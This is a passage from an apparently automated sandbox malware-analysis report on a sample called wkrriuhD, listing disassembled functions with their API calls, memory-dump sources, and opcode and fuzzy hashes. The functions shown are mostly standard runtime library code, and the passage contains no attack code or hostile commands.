                                                                                                                                                                                          • int.LIBCPMT ref: 005A1F65
                                                                                                                                                                                            • Part of subcall function 0059EEA3: std::_Lockit::_Lockit.LIBCPMT ref: 0059EEB4
                                                                                                                                                                                            • Part of subcall function 0059EEA3: std::_Lockit::~_Lockit.LIBCPMT ref: 0059EECE
                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 005A1FA5
                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 005A1FAE
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 005A1FCC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                          • String ID: (mG
                                                                                                                                                                                          • API String ID: 2536120697-4059303827
                                                                                                                                                                                          • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                                                                                                                                                                          • Instruction ID: 403d47d9a2563ac1bc90502e311840504f77752c65a8443ae9db383ef40bcad6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D110632A00519AFCB10EBA8E90A9DDBF78FF81720F10456AF804A7291DB319E41CBD4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1236A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,1236A351,123692BE), ref: 1236A368
                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 1236A376
                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1236A38F
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,1236A351,123692BE), ref: 1236A3E1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                          • Opcode ID: da43f334add93bd16fed927777e93a555aaa764f404b655859ac46518176ef7c
                                                                                                                                                                                          • Instruction ID: b40f45bb21ebdcc7a77afe13af1a69e645184d7645e0843e0d70937dbe4869a5
                                                                                                                                                                                          • Opcode Fuzzy Hash: da43f334add93bd16fed927777e93a555aaa764f404b655859ac46518176ef7c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E0147BB24C3669EE35616FA6CC57BB364CEB467F5330033AE01CD40D8EF919A069240
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005E179E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID: {-Y
                                                                                                                                                                                          • API String ID: 269201875-2507730204
                                                                                                                                                                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                                          • Instruction ID: 83a5ec52acd167b3042d6edbe61e0f325a98b96e5bbea94743780baf4128faac
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                                          • Instruction Fuzzy Hash: C8F04F3250864467C634EB6DF8C6D1A7BD9FA48B607A8881AF148DB711DB30FD80C65C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A950 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040A95C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 0040A969
                                                                                                                                                                                          • GetVersionExA.KERNEL32 ref: 0040A98E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcVersion
                                                                                                                                                                                          • String ID: Borland32$GetProcAddress$kernel32.dll
                                                                                                                                                                                          • API String ID: 3310240892-88975745
                                                                                                                                                                                          • Opcode ID: 71768c722f78eb4a901d9742671c74955e51422b3e1bdaee8fac7f9ce878333a
                                                                                                                                                                                          • Instruction ID: 97e9abc9fd215974bacc07cebeb4f04fad71689b84616a9e44a7f54312f028c9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 71768c722f78eb4a901d9742671c74955e51422b3e1bdaee8fac7f9ce878333a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 66F090F130930987E3109B208D06B663644E300304F25493F68A9B66D2DFBC80E9AB5F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040419B Relevance: 10.1, Strings: 8, Instructions: 73COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: XXTYPE.CPP$XXTYPE.CPP$XXTYPE.CPP$XXTYPE.CPP$tp1$tp1->tpName$tp2$tp2->tpName
                                                                                                                                                                                          • API String ID: 0-2803269351
                                                                                                                                                                                          • Opcode ID: 283ac59ee2ffe6cf53dfa6a0385c90501cca73d622cd6219affc2671511527d7
                                                                                                                                                                                          • Instruction ID: 26f1763e8cf9c968968e8af5b86e6365d3689f23285e0e0a8c5b68ab61dc0408
                                                                                                                                                                                          • Opcode Fuzzy Hash: 283ac59ee2ffe6cf53dfa6a0385c90501cca73d622cd6219affc2671511527d7
                                                                                                                                                                                          • Instruction Fuzzy Hash: C0113AA174431091C7206A528C8AB7677518FF0B94F18487BFF953A7C1E3BD98E1826E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14648821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,14646FFD,00000000,?,?,?,14648A72,?,?,00000100), ref: 1464887B
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,14648A72,?,?,00000100,5EFC4D8B,?,?), ref: 14648901
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 146489FB
                                                                                                                                                                                          • __freea.LIBCMT ref: 14648A08
                                                                                                                                                                                            • Part of subcall function 146456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 14645702
                                                                                                                                                                                          • __freea.LIBCMT ref: 14648A11
                                                                                                                                                                                          • __freea.LIBCMT ref: 14648A36
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                                                                          • Opcode ID: fb324a4db6aea97efbbc325535a3808cce5d86083b521b7bb6f91921f8553f04
                                                                                                                                                                                          • Instruction ID: 4ee68b61a809eafe9c7cd38e8e251d9e08fee8f561604e21eae1bb28a231a8cd
                                                                                                                                                                                          • Opcode Fuzzy Hash: fb324a4db6aea97efbbc325535a3808cce5d86083b521b7bb6f91921f8553f04
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2651F876A10216AFEF158F64CC40EAB37A9EF61668F394628FD04D7180EB75EC90C660
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005D66DB Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __cftoe
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4189289331-0
                                                                                                                                                                                          • Opcode ID: 9a4a9018df91bb80547d8cd227be064c11647db9cc7a9b7c485a3b8778a52ece
                                                                                                                                                                                          • Instruction ID: 8e850cd5240ac17d7daaf059bcf3fd8a858dff02dd7d7e78d2e06c10a914949e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a4a9018df91bb80547d8cd227be064c11647db9cc7a9b7c485a3b8778a52ece
                                                                                                                                                                                          • Instruction Fuzzy Hash: 81510B3290020AABDB349B6C8C45EAE7FE9FF89324F14411BF414D6381EB35DD429B64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 146415DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _strlen.LIBCMT ref: 14641607
                                                                                                                                                                                          • _strcat.LIBCMT ref: 1464161D
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1464190E,?,?,00000000,?,00000000), ref: 14641643
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 1464165A
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,1464190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 14641661
                                                                                                                                                                                          • lstrcatW.KERNEL32(00001008,?), ref: 14641686
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1922816806-0
                                                                                                                                                                                          • Opcode ID: ab85c8160180ecd86b51b90fc8233f233b916c5d49565c91f85492f2b7068f1e
                                                                                                                                                                                          • Instruction ID: 9640fc86e1f352fba34186e1c2f25631fec02fbca35f30fc4280c1f8c8eb3c40
                                                                                                                                                                                          • Opcode Fuzzy Hash: ab85c8160180ecd86b51b90fc8233f233b916c5d49565c91f85492f2b7068f1e
                                                                                                                                                                                          • Instruction Fuzzy Hash: FC21DD36A00204EBDF05DF54EC85EEE77B8EF58718F38402AE504AB141DB34B94187A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14641000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 14641038
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1464104B
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 14641061
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 14641075
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 14641090
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 146410B8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3594823470-0
                                                                                                                                                                                          • Opcode ID: 3ab32203b956ba9cb1b661b3be15d3213c9449f5e62d2b922656d5ebbc7d18be
                                                                                                                                                                                          • Instruction ID: b388c777dc500abc7f6cc8a4051750f014b1fc30a3edd72c92a991ae19487399
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ab32203b956ba9cb1b661b3be15d3213c9449f5e62d2b922656d5ebbc7d18be
                                                                                                                                                                                          • Instruction Fuzzy Hash: 47218339A00329DBCF21DF60EC4CEDB376CEF54618F244156E959971A2DE309B86CB40
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14643856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,14643518,146423F1,14641F17), ref: 14643864
                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 14643872
                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1464388B
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,14643518,146423F1,14641F17), ref: 146438DD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                          • Opcode ID: 9952ca10394c2721eb5a73118633863603bf0b73330d2d87055289d2868dd030
                                                                                                                                                                                          • Instruction ID: 629da6825b375b1d8348141146e5ab9168ca07febee1d072afb25b50741d444a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9952ca10394c2721eb5a73118633863603bf0b73330d2d87055289d2868dd030
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4601B13670A7226EFF252A79ACC4A076A5CDB35ABCB38022EF510990D1EE2158C18248
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14645AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,14646C6C), ref: 14645AFA
                                                                                                                                                                                          • _free.LIBCMT ref: 14645B2D
                                                                                                                                                                                          • _free.LIBCMT ref: 14645B55
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,14646C6C), ref: 14645B62
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,14646C6C), ref: 14645B6E
                                                                                                                                                                                          • _abort.LIBCMT ref: 14645B74
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                          • Opcode ID: 1b76eeb4b50df33d0fa3dc14a387e1e1058fa8f17b92b27cc432244fc2dbfb6c
                                                                                                                                                                                          • Instruction ID: 006cab5c7c0b8b9cd27ef33af6fd73c5b2833cbc7cdf8e916c5547e83b6898f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b76eeb4b50df33d0fa3dc14a387e1e1058fa8f17b92b27cc432244fc2dbfb6c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF0A43A605611FBEF1326346C58E5A2A2DCBF1A6DB3C0128FB14A7A80FE3498034169
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12378215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(00000020,?,1236A7F5,?,?,?,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B), ref: 12378219
                                                                                                                                                                                          • _free.LIBCMT ref: 1237824C
                                                                                                                                                                                          • _free.LIBCMT ref: 12378274
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B,?,00000041,00000000,00000000), ref: 12378281
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B,?,00000041,00000000,00000000), ref: 1237828D
                                                                                                                                                                                          • _abort.LIBCMT ref: 12378293
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                          • Opcode ID: 743f54f30b9df6e59dd653045cd0daf94e86ef2d64abaef5a00871d68267c6f5
                                                                                                                                                                                          • Instruction ID: 254628428d53812d1f91725ac887788409f8d2f13dde966c29bf5e30c3dbc376
                                                                                                                                                                                          • Opcode Fuzzy Hash: 743f54f30b9df6e59dd653045cd0daf94e86ef2d64abaef5a00871d68267c6f5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11F02D7B544B916ACF9222285C48FAB361D8FD23B2F240B24F818D2290EF3C9C02B550
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040293C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 197COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • @__lockDebuggerData$qv.WKRRIUHD ref: 00402A6E
                                                                                                                                                                                          • @__unlockDebuggerData$qv.WKRRIUHD ref: 00402B4A
                                                                                                                                                                                          • RaiseException.KERNEL32(0EEFFACE,00000001,00000003,?), ref: 00402BE0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Data$qvDebugger$@__lock@__unlockExceptionRaise
                                                                                                                                                                                          • String ID: XX.CPP$cctrAddr
                                                                                                                                                                                          • API String ID: 3785177639-3056909104
                                                                                                                                                                                          • Opcode ID: 9b0dcf674f86b935d2a4c104f27c6c37c2c543f1610da28e0affacaed0fd5f83
                                                                                                                                                                                          • Instruction ID: dc70eccd86edc0d9cac4dc8b0ae7afb86e4c01960d635f7c74c805de0bb0e1ab
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b0dcf674f86b935d2a4c104f27c6c37c2c543f1610da28e0affacaed0fd5f83
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF913B74A00258DFCB14DFA9D585BA9B7B1BF48308F1481BEF8486B392C779D841CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005AAD96 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 176COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                                          • String ID: S~E$PG$PG$PG
                                                                                                                                                                                          • API String ID: 3519838083-2466073847
                                                                                                                                                                                          • Opcode ID: 38c21b094f1b4e1a64d7b2f97ecc41d8024848913b57eda60fc2449cd9e24858
                                                                                                                                                                                          • Instruction ID: 3175648e28e0643b1dc24d56847e604a8b7a4daf931bc55a90ee1b9fc0180788
                                                                                                                                                                                          • Opcode Fuzzy Hash: 38c21b094f1b4e1a64d7b2f97ecc41d8024848913b57eda60fc2449cd9e24858
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8451AD60A4024ABBCF18FBB4CC5AAFE7F69BF95300F40402AF445AB192EF285E45C751
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0059264C Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 005C5552: __onexit.LIBCMT ref: 005C5558
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 005926A0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Init_thread_footer__onexit
                                                                                                                                                                                          • String ID: PkG$XMG$NG$NG
                                                                                                                                                                                          • API String ID: 1881088180-3151166067
                                                                                                                                                                                          • Opcode ID: 81a4b8ea1a2a8dd188103dc24f06caf07ba89953b00c1715f800357eb9072b97
                                                                                                                                                                                          • Instruction ID: 4a5d9f88e918a97b5e1376e7c42c5111c7ec6cfb422a0c58c7e074bdd15dcca3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 81a4b8ea1a2a8dd188103dc24f06caf07ba89953b00c1715f800357eb9072b97
                                                                                                                                                                                          • Instruction Fuzzy Hash: F9419131104711ABCB24FB68DDAAAEE7B9ABBC1310F10452DF44AD61E2EF306D4AC755
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005D35E3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: PkGNG
                                                                                                                                                                                          • API String ID: 0-263838557
                                                                                                                                                                                          • Opcode ID: 6432c744e00329bb486b15d835566ca43a09715d1a124345af01da605e15d9f5
                                                                                                                                                                                          • Instruction ID: 6f14054266d56a47c19b6834d5440cb0a0620d3bba3e94929321794d2eb63cd6
